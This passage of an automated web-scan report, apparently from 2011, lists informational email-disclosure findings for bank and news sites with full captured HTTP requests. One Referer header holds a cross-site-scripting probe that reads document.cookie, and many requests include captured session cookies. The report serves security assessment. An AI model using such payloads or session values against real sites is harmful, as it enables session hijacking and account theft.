Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:13 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC9zZWMvRm9ybXMuZG8.
Keep-Alive: timeout=60, max=297
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 53716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">



...[SNIP]...
}
if (fields.length > 0) {
focusField.focus();
alert(fields.join('\n'));
}
return bValid;
}

/**
* Reference: Sandeep V. Tamhankar (stamhankar@hotmail.com),
* http://javascript.internet.com
*/
function checkEmail(emailStr) {
if (emailStr.length == 0) {
return true;
}
var emailPat=/^(.+)@(.+)$/;
var sp
...[SNIP]...
<option value='Service1@pnc.com'>General</option><option value='Service1@pnc.com'>
...[SNIP]...
<option value='Service1@pnc.com'>Others</option><option value='Service1@pnc.com'>
...[SNIP]...
<option value='Service1@pnc.com'>
...[SNIP]...

19.123. https://www.pnc.com/webapp/unsec/Blank.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/unsec/Blank.do

Issue detail

The following email address was disclosed in the response:

Request

GET /webapp/unsec/Blank.do?siteArea=/pnccorp/PNC/Home/Personal/Loans/LandingPages/CHELOC+Home+Improvement&WT.mc_id=LOAN10_PNCWeb_0001&WT.ac=CHELOC_0810_P_LN HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:05 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9CbGFuay5kbw..
Keep-Alive: timeout=60, max=295
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 62518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">



...[SNIP]...
}
if (fields.length > 0) {
focusField.focus();
alert(fields.join('\n'));
}
return bValid;
}

/**
* Reference: Sandeep V. Tamhankar (stamhankar@hotmail.com),
* http://javascript.internet.com
*/
function checkEmail(emailStr) {
if (emailStr.length == 0) {
return true;
}
var emailPat=/^(.+)@(.+)$/;
var sp
...[SNIP]...

19.124. https://www.pnc.com/webapp/unsec/depositRates/init.app  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/unsec/depositRates/init.app

Issue detail

The following email address was disclosed in the response:

Request

GET /webapp/unsec/depositRates/init.app HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:10 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9kZXBvc2l0UmF0ZXMvaW5pdC5hcHA.
Keep-Alive: timeout=60, max=291
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 40302

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - Interest Rate Center</title>
<meta http-e
...[SNIP]...
}
if (fields.length > 0) {
focusField.focus();
alert(fields.join('\n'));
}
return bValid;
}

/**
* Reference: Sandeep V. Tamhankar (stamhankar@hotmail.com),
* http://javascript.internet.com
*/
function checkEmail(emailStr) {
if (emailStr.length == 0) {
return true;
}
var emailPat=/^(.+)@(.+)$/;
var sp
...[SNIP]...

19.125. https://www.pnc.com/webapp/unsec/homeEquity/init.app  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/unsec/homeEquity/init.app

Issue detail

The following email address was disclosed in the response:

Request

GET /webapp/unsec/homeEquity/init.app HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:10 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9ob21lRXF1aXR5L2luaXQuYXBw
Keep-Alive: timeout=60, max=287
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 39863

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - PNC Home Equity Loan Rates Search</title>
...[SNIP]...
}
if (fields.length > 0) {
focusField.focus();
alert(fields.join('\n'));
}
return bValid;
}

/**
* Reference: Sandeep V. Tamhankar (stamhankar@hotmail.com),
* http://javascript.internet.com
*/
function checkEmail(emailStr) {
if (emailStr.length == 0) {
return true;
}
var emailPat=/^(.+)@(.+)$/;
var sp
...[SNIP]...

19.126. http://www.positioniseverything.net/easyclearing.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.positioniseverything.net
Path:   /easyclearing.html

Issue detail

The following email address was disclosed in the response:

Request

GET /easyclearing.html HTTP/1.1
Host: www.positioniseverything.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:23 GMT
Server: Apache/1.3.41 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8a
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 24290

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>


<title>Clearing a float container without source markup</title>

<meta http-equiv
...[SNIP]...
<a href="mailto:johnthebig66@yahoo.com">
...[SNIP]...

19.127. http://www.retirement.merrilledge.com/publish/js/2010.12.14/global_min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.retirement.merrilledge.com
Path:   /publish/js/2010.12.14/global_min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /publish/js/2010.12.14/global_min.js HTTP/1.1
Host: www.retirement.merrilledge.com
Proxy-Connection: keep-alive
Referer: http://www.retirement.merrilledge.com/IRA/pages/home.aspx?%009627c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eac0806a009c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=pD0NN85dpKsfx4BE99QArdi7rMPowZAp7prEX+xQsDRMZ5srEb6GWErE0ytcq4STJF6RcnSEbMoqhPh20hiX9f5JuWLY3Sh0nVg+L0bkPZp8qurqKXGj/drs1Sn6FhhN7RurCP0kK/9BVZCixCGwFXnpPgkR7yd/C9Ci7CEdBuIZ2phvHS3TICDfcva4faAIZLGdCT0rJZfWSHqGBGRuS5wEBKSn0pDx44kMCJ/a2HEa+Zu0fT4K1i/+8UG4BntMDKs6xA/EgABaMXNP6xhj+XNMspLCnGY0vTmGIQrLrF1rsj2YGCWdB5tUEWE3XtqwGQgQPxrqBH7Elt9ELCr4PmPlmXAd+5Ulox5teW48BAV7hlSkTVM2gm3bMpyD77ckeumpzJ5KAi4+BNg0DeBoTY9rYwqbZhf4vwXlnYb4lG5nVuz8sI+SKIWGUMDxfYcZBV6FBKk1Y5IlaVyugds9CwwP5J9aQ0dKe0g9/CjI6lRNE4NcVrDBUbv7c7WvxH0AFm3z2Rs4P96BbBwGYkdZ9CEz3D3DfltUqi+e1CLIx23wojYb+xRFVed43Jq5b7jCPdRqlbRDmd7jV0ZPq6jE1GPAZRnhhoxVr6Mh7eTrYMLa45VGhXkFG4gTdf3j3mfd; pxs=689c136b798e446897d1c2e0184bb0f5; BrowserCheckDone=true

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: http://www.retirement.merrilledge.com/publish/js/2010.12.14/global_min.js
Last-Modified: Tue, 14 Dec 2010 15:46:16 GMT
Accept-Ranges: bytes
ETag: "054e7aa69bcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:20:59 GMT
Content-Length: 120397

var Prototype={Version:"1.5.1.1",Browser:{IE:!!(window.attachEvent&&!window.opera),Opera:!!window.opera,WebKit:navigator.userAgent.indexOf("AppleWebKit/")>-1,Gecko:navigator.userAgent.indexOf("Gecko")
...[SNIP]...
<a href="mailto:ira@ml.com?subject=Please send me more information about the IRA">
...[SNIP]...

19.128. http://www.sipc.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sipc.org
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.sipc.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:20:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>SIPC - Securities Investor Protection Corporation</title>
<meta http-equiv="Content-Type" content="
...[SNIP]...
<a href="mailto:kphillips@hastingsgroup.com">
...[SNIP]...

19.129. http://www.thestandard.com.hk/news_detail.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thestandard.com.hk
Path:   /news_detail.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /news_detail.asp?we_cat=4&art_id=107529&sid=31063765&con_type=1&d_str=20110127&fc=4 HTTP/1.1
Host: www.thestandard.com.hk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 01:17:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 59076
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSCSSRSQ=KECBPJKADJGPCICDBADCHBPA; path=/
Cache-control: private


<html>

<HTML>


<HEAD>

<title>Aqua City deaths make splash - The Standard</title>
<meta NAME="keywords" CONTENT="Aqua,City,deaths,make,splash,The Standard">
<meta NAME="description" CON
...[SNIP]...
<a href="mailto:feedback@thestandard.com.hk">
...[SNIP]...
<a href="mailto:editor@thestandard.com.hk">
...[SNIP]...

19.130. http://www.w3.org/TR/html4/loose.dtd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3.org
Path:   /TR/html4/loose.dtd

Issue detail

The following email addresses were disclosed in the response:

Request

GET /TR/html4/loose.dtd HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:28:22 GMT
Server: Apache/2
Content-Location: loose.dtd.raw
Vary: negotiate,accept-encoding,User-Agent
TCN: choice
Last-Modified: Fri, 24 Dec 1999 23:37:48 GMT
ETag: "b17a-35c741aef8b00;475d1b7cb20c0"
Accept-Ranges: bytes
Content-Length: 45434
Cache-Control: max-age=7776000
Expires: Tue, 03 May 2011 22:28:22 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/plain

<!--
This is the HTML 4.01 Transitional DTD, which includes
presentation attributes and elements that W3C expects to phase out
as support for style sheets matures. Authors should use the S
...[SNIP]...
<dsr@w3.org>
...[SNIP]...
<lehors@w3.org>
...[SNIP]...
<ij@w3.org>
...[SNIP]...

19.131. http://www.w3.org/TR/html4/strict.dtd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3.org
Path:   /TR/html4/strict.dtd

Issue detail

The following email addresses were disclosed in the response:

Request

GET /TR/html4/strict.dtd HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:29:53 GMT
Server: Apache/2
Content-Location: strict.dtd.raw
Vary: negotiate,accept-encoding,User-Agent
TCN: choice
Last-Modified: Fri, 24 Dec 1999 23:37:48 GMT
ETag: "8720-35c741aef8b00;475d1b7cb20c0"
Accept-Ranges: bytes
Content-Length: 34592
Cache-Control: max-age=7776000
Expires: Tue, 03 May 2011 22:29:53 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/plain

<!--
This is HTML 4.01 Strict DTD, which excludes the presentation
attributes and elements that W3C expects to phase out as
support for style sheets matures. Authors should use the Stric
...[SNIP]...
<dsr@w3.org>
...[SNIP]...
<lehors@w3.org>
...[SNIP]...
<ij@w3.org>
...[SNIP]...

19.132. https://www.wachovia.com/common_files/metrics/vignette/stats.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /common_files/metrics/vignette/stats.js

Issue detail

The following email address was disclosed in the response:

Request

GET /common_files/metrics/vignette/stats.js HTTP/1.1
Host: www.wachovia.com
Connection: keep-alive
Referer: https://www.wachovia.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CB01F7F42F17102FA757AB53C440707C; originalReferrer=

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:52 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 14 Dec 2010 18:10:09 GMT
Accept-Ranges: bytes
Cache-Control: max-age=-3124243
Expires: Tue, 28 Dec 2010 18:10:09 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Keep-Alive: timeout=10, max=82
Connection: Keep-Alive
Content-Type: application/x-javascript
Content-Length: 48738

/* Omniture SiteCatalyst Code */
var sc_code_ver="v 5.4"

/* REPORT SUITE ID SET PRIOR TO OMNI CODE CALL */
if(!s_account) var s_account="wachoviaglobal"
var s=s_gi(s_account)

/************* D
...[SNIP]...
#K=#W($L,(vt$4t`cvt)"
+"`Ys.hav()+q+(qs?qs:s.rq(^7)),0,id,ta);qs`h;`Rm('t')`5s.p_r)s.p_r(`I`d`h}^J(qs);^T`v($E;`k$E`e^3,`H$X1',vb`I@Q=^H=s.`Q`s=s.`Q^4=`G`o`h`5s.pg)`G^z@Q=`G^zeo=`G^z`Q`s=`G^z`Q^4`h`5!id@8s.tc@3tc=1;s.flus"
+"h`V()}`3#K`Ctl`0o,t,n,vo`2;s.@Q=$Po`I`Q^4=t;s.`Q`s=n;s.t($E}`5pg){`G^zco`0o){`N^t\"_\",1,$I`3$Po)`Cwd^zgs`0u$6`N^tun,1,$I`3s.t()`Cwd^zdc`0u$6`N^tun,$I`3s.t()}}@El=(`G`M`m`9`4'@Ss@20`I
...[SNIP]...

19.133. https://www.wachovia.com/files/Hands_on_Banking.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /files/Hands_on_Banking.pdf

Issue detail

The following email address was disclosed in the response:

Request

GET /files/Hands_on_Banking.pdf HTTP/1.1
Host: www.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:28:53 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 12 Aug 2010 23:10:09 GMT
Accept-Ranges: bytes
Content-Length: 124996
Cache-Control: max-age=-13821524
Expires: Thu, 26 Aug 2010 23:10:09 GMT
X-UA-Compatible: IE=EmulateIE7
Keep-Alive: timeout=10, max=184
Connection: Keep-Alive
Content-Type: application/pdf

%PDF-1.7%....
5 0 obj<</Linearized 1/L 124996/O 7/E 120207/N 1/T 124855/H [ 1516 267]>>endobj xref5 610000000016 00000 n
0000001783 00000 n
0000001860 00000 n
0000002277 000
...[SNIP]...
</URI(mailto:HOBinfo@wellsfargo.com.)/S/URI>>/URI(mailto:HOBinfo@wellsfargo.com.)/H/N/Border[0 0 0]/Type/Annot>
...[SNIP]...

19.134. http://www.wcti12.com/news/26551757/detail.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcti12.com
Path:   /news/26551757/detail.html

Issue detail

The following email address was disclosed in the response:

Request

GET /news/26551757/detail.html HTTP/1.1
Host: www.wcti12.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Length: 45691
Content-Type: text/html
Set-Cookie: alpha=35ce8f186d5f00002e024a4d32200c00e6bc0100; expires=Sun, 31-Jan-2021 01:17:34 GMT; path=/; domain=.wcti12.com
X-IBS-CCDS-VERSION: 2.16.16
X-IBS-CCDS-ORIGIN: origin131
X-Flow: xslt-in-production
Cache-Control: max-age=596
Expires: Thu, 03 Feb 2011 01:27:30 GMT
Date: Thu, 03 Feb 2011 01:17:34 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html class="no-js">
<head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1
...[SNIP]...
<a href="mailto:kjeffries@wcti12.com">
...[SNIP]...

19.135. https://www.wellsfargo.com/equity/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /equity/

Issue detail

The following email address was disclosed in the response:

Request

GET /equity/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:44 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=2TyTNJhY3JchnGmJ4bFhFZNhrNjKnLLw809GTQGsf17zgJWCnCyt!-530822505; domain=.wellsfargo.com; path=/; secure
Set-Cookie: msc=5572; domain=.wellsfargo.com; expires=Friday, 04-Mar-2011 22:29:44 GMT; path=/
Set-Cookie: ISD_WCM_COOKIE=2129943306.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Home Equity Loans & Li
...[SNIP]...
<a href="https://mortgage.rsys1.net/servlet/campaignrespondent?_ID_=wfhmc.104&email=you@company.com&DM_NUMBER=DMIHE1209&MSC=5551" title="Subscribe to Free Email Newsletter">
...[SNIP]...

19.136. https://www.wellsfargo.com/help/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /help/

Issue detail

The following email address was disclosed in the response:

Request

GET /help/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:21 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=fTG5NJhBTvhh8THS9LpgByvt7m89Gy4r1dsVhd3yzr8nQnnF6vzk!349572437; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Customer Service f
...[SNIP]...
<br/>reportphish@wellsfargo.com</li>
...[SNIP]...

19.137. https://www.wellsfargo.com/privacy_security/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /privacy_security/

Issue detail

The following email address was disclosed in the response:

Request

GET /privacy_security/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:31 GMT
Content-length: 7654
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=5MdgNJhLPQJrJbQL2dj2np2B79whD7Gkrq9kkphmPHd9S35MYVGj!457746116; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Privacy & Security
...[SNIP]...
<br/>reportphish@wellsfargo.com
<br/>
...[SNIP]...

19.138. https://www.wellsfargo.com/privacy_security/fraud/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /privacy_security/fraud/

Issue detail

The following email address was disclosed in the response:

Request

GET /privacy_security/fraud/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:29 GMT
Content-length: 7546
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=yVv2NJhJb35jxN6JYsp0LJR40jSkyXq8BL1vVYQycy3X5yBqpGnH!-1164025042; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2633259786.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo Privacy an
...[SNIP]...
<br/>reportphish@wellsfargo.com<br/>
...[SNIP]...

19.139. https://www.wellsfargo.com/privacy_security/fraud/report/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /privacy_security/fraud/report/

Issue detail

The following email address was disclosed in the response:

Request

GET /privacy_security/fraud/report/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:27 GMT
Content-length: 6368
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=vJxpNJhHLn21ThPNMCWcdb7TJvhkn1h6BwPSlv9wX4vqvRzqm8Cv!312685559; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2264161034.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Privacy and Securi
...[SNIP]...
<br/>reportphish@wellsfargo.com
<br/>
...[SNIP]...

19.140. https://www.wellsfargo.com/privacy_security/fraud/report/fraud  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /privacy_security/fraud/report/fraud

Issue detail

The following email address was disclosed in the response:

Request

GET /privacy_security/fraud/report/fraud HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:29 GMT
Content-length: 5794
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=sGGJNJhJvdHFzNC5MkDQXh52s09R1dnm7LNy8v1BGT8qQTbWpMvl!-213655893; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2448710410.16927.0000; path=/
Connection: close


